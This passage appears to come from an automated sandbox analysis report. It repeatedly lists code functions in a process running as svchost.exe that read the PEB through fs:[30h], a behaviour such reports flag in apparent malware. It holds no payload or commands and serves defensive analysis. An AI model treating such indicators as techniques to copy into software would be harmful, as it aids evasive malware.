                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB035C mov eax, dword ptr fs:[00000030h]3_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB035C mov eax, dword ptr fs:[00000030h]3_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFA352 mov eax, dword ptr fs:[00000030h]3_2_03BFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD8350 mov ecx, dword ptr fs:[00000030h]3_2_03BD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB2349 mov eax, dword ptr fs:[00000030h]3_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B402A0 mov eax, dword ptr fs:[00000030h]3_2_03B402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B402A0 mov eax, dword ptr fs:[00000030h]3_2_03B402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C062D6 mov eax, dword ptr fs:[00000030h]3_2_03C062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC62A0 mov eax, dword ptr fs:[00000030h]3_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]3_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC62A0 mov eax, dword ptr fs:[00000030h]3_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC62A0 mov eax, dword ptr fs:[00000030h]3_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC62A0 mov eax, dword ptr fs:[00000030h]3_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC62A0 mov eax, dword ptr fs:[00000030h]3_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6E284 mov eax, dword ptr fs:[00000030h]3_2_03B6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6E284 mov eax, dword ptr fs:[00000030h]3_2_03B6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB0283 mov eax, dword ptr fs:[00000030h]3_2_03BB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB0283 mov eax, dword ptr fs:[00000030h]3_2_03BB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB0283 mov eax, dword ptr fs:[00000030h]3_2_03BB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B402E1 mov eax, dword ptr fs:[00000030h]3_2_03B402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B402E1 mov eax, dword ptr fs:[00000030h]3_2_03B402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B402E1 mov eax, dword ptr fs:[00000030h]3_2_03B402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]3_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2823B mov eax, dword ptr fs:[00000030h]3_2_03B2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C0625D mov eax, dword ptr fs:[00000030h]3_2_03C0625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE0274 mov eax, dword ptr fs:[00000030h]3_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B34260 mov eax, dword ptr fs:[00000030h]3_2_03B34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B34260 mov eax, dword ptr fs:[00000030h]3_2_03B34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B34260 mov eax, dword ptr fs:[00000030h]3_2_03B34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2826B mov eax, dword ptr fs:[00000030h]3_2_03B2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2A250 mov eax, dword ptr fs:[00000030h]3_2_03B2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36259 mov eax, dword ptr fs:[00000030h]3_2_03B36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BEA250 mov eax, dword ptr fs:[00000030h]3_2_03BEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BEA250 mov eax, dword ptr fs:[00000030h]3_2_03BEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB8243 mov eax, dword ptr fs:[00000030h]3_2_03BB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB8243 mov ecx, dword ptr fs:[00000030h]3_2_03BB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB019F mov eax, dword ptr fs:[00000030h]3_2_03BB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB019F mov eax, dword ptr fs:[00000030h]3_2_03BB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB019F mov eax, dword ptr fs:[00000030h]3_2_03BB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB019F mov eax, dword ptr fs:[00000030h]3_2_03BB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2A197 mov eax, dword ptr fs:[00000030h]3_2_03B2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2A197 mov eax, dword ptr fs:[00000030h]3_2_03B2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2A197 mov eax, dword ptr fs:[00000030h]3_2_03B2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C061E5 mov eax, dword ptr fs:[00000030h]3_2_03C061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B70185 mov eax, dword ptr fs:[00000030h]3_2_03B70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BEC188 mov eax, dword ptr fs:[00000030h]3_2_03BEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BEC188 mov eax, dword ptr fs:[00000030h]3_2_03BEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD4180 mov eax, dword ptr fs:[00000030h]3_2_03BD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD4180 mov eax, dword ptr fs:[00000030h]3_2_03BD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B601F8 mov eax, dword ptr fs:[00000030h]3_2_03B601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]3_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]3_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]3_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]3_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]3_2_03BAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF61C3 mov eax, dword ptr fs:[00000030h]3_2_03BF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF61C3 mov eax, dword ptr fs:[00000030h]3_2_03BF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B60124 mov eax, dword ptr fs:[00000030h]3_2_03B60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C04164 mov eax, dword ptr fs:[00000030h]3_2_03C04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C04164 mov eax, dword ptr fs:[00000030h]3_2_03C04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDA118 mov ecx, dword ptr fs:[00000030h]3_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDA118 mov eax, dword ptr fs:[00000030h]3_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDA118 mov eax, dword ptr fs:[00000030h]3_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDA118 mov eax, dword ptr fs:[00000030h]3_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF0115 mov eax, dword ptr fs:[00000030h]3_2_03BF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE10E mov eax, dword ptr fs:[00000030h]3_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE10E mov ecx, dword ptr fs:[00000030h]3_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE10E mov eax, dword ptr fs:[00000030h]3_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE10E mov eax, dword ptr fs:[00000030h]3_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE10E mov ecx, dword ptr fs:[00000030h]3_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE10E mov eax, dword ptr fs:[00000030h]3_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE10E mov eax, dword ptr fs:[00000030h]3_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE10E mov ecx, dword ptr fs:[00000030h]3_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE10E mov eax, dword ptr fs:[00000030h]3_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDE10E mov ecx, dword ptr fs:[00000030h]3_2_03BDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2C156 mov eax, dword ptr fs:[00000030h]3_2_03B2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC8158 mov eax, dword ptr fs:[00000030h]3_2_03BC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36154 mov eax, dword ptr fs:[00000030h]3_2_03B36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36154 mov eax, dword ptr fs:[00000030h]3_2_03B36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC4144 mov eax, dword ptr fs:[00000030h]3_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC4144 mov eax, dword ptr fs:[00000030h]3_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC4144 mov ecx, dword ptr fs:[00000030h]3_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC4144 mov eax, dword ptr fs:[00000030h]3_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC4144 mov eax, dword ptr fs:[00000030h]3_2_03BC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF60B8 mov eax, dword ptr fs:[00000030h]3_2_03BF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]3_2_03BF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B280A0 mov eax, dword ptr fs:[00000030h]3_2_03B280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC80A8 mov eax, dword ptr fs:[00000030h]3_2_03BC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3208A mov eax, dword ptr fs:[00000030h]3_2_03B3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]3_2_03B2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B720F0 mov ecx, dword ptr fs:[00000030h]3_2_03B720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]3_2_03B2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B380E9 mov eax, dword ptr fs:[00000030h]3_2_03B380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB60E0 mov eax, dword ptr fs:[00000030h]3_2_03BB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB20DE mov eax, dword ptr fs:[00000030h]3_2_03BB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC6030 mov eax, dword ptr fs:[00000030h]3_2_03BC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2A020 mov eax, dword ptr fs:[00000030h]3_2_03B2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2C020 mov eax, dword ptr fs:[00000030h]3_2_03B2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4E016 mov eax, dword ptr fs:[00000030h]3_2_03B4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4E016 mov eax, dword ptr fs:[00000030h]3_2_03B4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4E016 mov eax, dword ptr fs:[00000030h]3_2_03B4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4E016 mov eax, dword ptr fs:[00000030h]3_2_03B4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB4000 mov ecx, dword ptr fs:[00000030h]3_2_03BB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD2000 mov eax, dword ptr fs:[00000030h]3_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD2000 mov eax, dword ptr fs:[00000030h]3_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD2000 mov eax, dword ptr fs:[00000030h]3_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD2000 mov eax, dword ptr fs:[00000030h]3_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD2000 mov eax, dword ptr fs:[00000030h]3_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD2000 mov eax, dword ptr fs:[00000030h]3_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD2000 mov eax, dword ptr fs:[00000030h]3_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD2000 mov eax, dword ptr fs:[00000030h]3_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5C073 mov eax, dword ptr fs:[00000030h]3_2_03B5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B32050 mov eax, dword ptr fs:[00000030h]3_2_03B32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB6050 mov eax, dword ptr fs:[00000030h]3_2_03BB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B307AF mov eax, dword ptr fs:[00000030h]3_2_03B307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE47A0 mov eax, dword ptr fs:[00000030h]3_2_03BE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD678E mov eax, dword ptr fs:[00000030h]3_2_03BD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B347FB mov eax, dword ptr fs:[00000030h]3_2_03B347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B347FB mov eax, dword ptr fs:[00000030h]3_2_03B347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B527ED mov eax, dword ptr fs:[00000030h]3_2_03B527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B527ED mov eax, dword ptr fs:[00000030h]3_2_03B527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B527ED mov eax, dword ptr fs:[00000030h]3_2_03B527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]3_2_03BBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]3_2_03B3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB07C3 mov eax, dword ptr fs:[00000030h]3_2_03BB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6273C mov eax, dword ptr fs:[00000030h]3_2_03B6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6273C mov ecx, dword ptr fs:[00000030h]3_2_03B6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6273C mov eax, dword ptr fs:[00000030h]3_2_03B6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAC730 mov eax, dword ptr fs:[00000030h]3_2_03BAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6C720 mov eax, dword ptr fs:[00000030h]3_2_03B6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6C720 mov eax, dword ptr fs:[00000030h]3_2_03B6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B30710 mov eax, dword ptr fs:[00000030h]3_2_03B30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B60710 mov eax, dword ptr fs:[00000030h]3_2_03B60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6C700 mov eax, dword ptr fs:[00000030h]3_2_03B6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B38770 mov eax, dword ptr fs:[00000030h]3_2_03B38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40770 mov eax, dword ptr fs:[00000030h]3_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40770 mov eax, dword ptr fs:[00000030h]3_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40770 mov eax, dword ptr fs:[00000030h]3_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40770 mov eax, dword ptr fs:[00000030h]3_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40770 mov eax, dword ptr fs:[00000030h]3_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40770 mov eax, dword ptr fs:[00000030h]3_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40770 mov eax, dword ptr fs:[00000030h]3_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40770 mov eax, dword ptr fs:[00000030h]3_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40770 mov eax, dword ptr fs:[00000030h]3_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40770 mov eax, dword ptr fs:[00000030h]3_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40770 mov eax, dword ptr fs:[00000030h]3_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40770 mov eax, dword ptr fs:[00000030h]3_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B30750 mov eax, dword ptr fs:[00000030h]3_2_03B30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BBE75D mov eax, dword ptr fs:[00000030h]3_2_03BBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72750 mov eax, dword ptr fs:[00000030h]3_2_03B72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72750 mov eax, dword ptr fs:[00000030h]3_2_03B72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB4755 mov eax, dword ptr fs:[00000030h]3_2_03BB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6674D mov esi, dword ptr fs:[00000030h]3_2_03B6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6674D mov eax, dword ptr fs:[00000030h]3_2_03B6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6674D mov eax, dword ptr fs:[00000030h]3_2_03B6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B666B0 mov eax, dword ptr fs:[00000030h]3_2_03B666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]3_2_03B6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B34690 mov eax, dword ptr fs:[00000030h]3_2_03B34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B34690 mov eax, dword ptr fs:[00000030h]3_2_03B34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]3_2_03BAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]3_2_03BAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]3_2_03BAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]3_2_03BAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB06F1 mov eax, dword ptr fs:[00000030h]3_2_03BB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB06F1 mov eax, dword ptr fs:[00000030h]3_2_03BB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]3_2_03B6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]3_2_03B6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4E627 mov eax, dword ptr fs:[00000030h]3_2_03B4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B66620 mov eax, dword ptr fs:[00000030h]3_2_03B66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B68620 mov eax, dword ptr fs:[00000030h]3_2_03B68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3262C mov eax, dword ptr fs:[00000030h]3_2_03B3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B72619 mov eax, dword ptr fs:[00000030h]3_2_03B72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAE609 mov eax, dword ptr fs:[00000030h]3_2_03BAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4260B mov eax, dword ptr fs:[00000030h]3_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4260B mov eax, dword ptr fs:[00000030h]3_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4260B mov eax, dword ptr fs:[00000030h]3_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4260B mov eax, dword ptr fs:[00000030h]3_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4260B mov eax, dword ptr fs:[00000030h]3_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4260B mov eax, dword ptr fs:[00000030h]3_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4260B mov eax, dword ptr fs:[00000030h]3_2_03B4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B62674 mov eax, dword ptr fs:[00000030h]3_2_03B62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF866E mov eax, dword ptr fs:[00000030h]3_2_03BF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF866E mov eax, dword ptr fs:[00000030h]3_2_03BF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6A660 mov eax, dword ptr fs:[00000030h]3_2_03B6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6A660 mov eax, dword ptr fs:[00000030h]3_2_03B6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B4C640 mov eax, dword ptr fs:[00000030h]3_2_03B4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B545B1 mov eax, dword ptr fs:[00000030h]3_2_03B545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B545B1 mov eax, dword ptr fs:[00000030h]3_2_03B545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB05A7 mov eax, dword ptr fs:[00000030h]3_2_03BB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB05A7 mov eax, dword ptr fs:[00000030h]3_2_03BB05A7
